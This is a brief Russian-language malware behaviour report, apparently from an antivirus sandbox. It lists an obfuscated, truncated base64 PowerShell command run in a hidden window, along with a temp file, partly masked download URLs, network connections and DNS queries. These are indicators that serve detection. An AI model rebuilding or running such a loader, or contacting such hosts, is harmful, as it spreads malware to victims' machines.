Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABFAGwAeABxADkAeABpAD0AKAAnAEEAbgAnACsAKAAnADIAcgA2ACcAKwAnADIAYwAnACkAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAdQBTAGUAcgBQAFIAbwBGAGkAbABFAFwAcABSAGgAWAB1AEsAUQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1448
- %TEMP%\1138323.cvr
- 'de##pro.com':80
- 'de##pro.com':443
- 'x1.#.lencr.org':80
- 'hb####ileged.com':80
- 'hb####ileged.com':443
- 'sh####nutrition.com':443
- 'po####vicedo.com':443
- 'mb###utions.ge':80
- http://de##pro.com/eTrac/s9/
- http://x1.#.lencr.org/
- http://hb####ileged.com/info/rp/
- http://mb###utions.ge/wp-admin/eRY/
- 'de##pro.com':443
- 'hb####ileged.com':443
- 'sh####nutrition.com':443
- 'po####vicedo.com':443
- DNS ASK ho####testing10.com
- DNS ASK de##pro.com
- DNS ASK x1.#.lencr.org
- DNS ASK hb####ileged.com
- DNS ASK sh####nutrition.com
- DNS ASK ic####n2cibar.org
- DNS ASK po####vicedo.com
- DNS ASK mb###utions.ge
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABFAGwAeABxADkAeABpAD0AKAAnAEEAbgAnACsAKAAnADIAcgA2ACcAKwAnADIAYwAnACkAKQA7AC4AKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAdQBTAGUAcgBQAFIAbwBGAGkAbABFAFwAcABSAGgAWAB1AEsAUQ... (со скрытым окном)